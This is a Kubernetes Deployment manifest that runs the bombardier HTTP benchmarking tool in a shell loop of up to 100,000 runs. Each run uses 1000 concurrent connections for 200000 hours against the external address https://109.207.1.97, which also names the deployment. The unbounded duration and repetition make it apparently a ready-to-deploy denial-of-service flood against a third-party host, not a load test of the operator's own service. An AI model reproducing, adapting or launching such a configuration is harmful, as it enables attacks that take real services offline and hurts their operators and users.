apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: https109.207.1.97
  name: https109.207.1.97
spec:
  replicas: 0
  selector:
    matchLabels:
      app: https109.207.1.97
  template:
    metadata:
      labels:
        app: https109.207.1.97
    spec:
      containers:
      - name: bombardier
        image: alpine/bombardier
        imagePullPolicy: IfNotPresent
        command: ["/bin/sh"]
        args: ["-c", "for run in $(seq 1 100000); do bombardier -c 1000 -d 200000h -r 10 -p i,p,r https://109.207.1.97 ; done"]
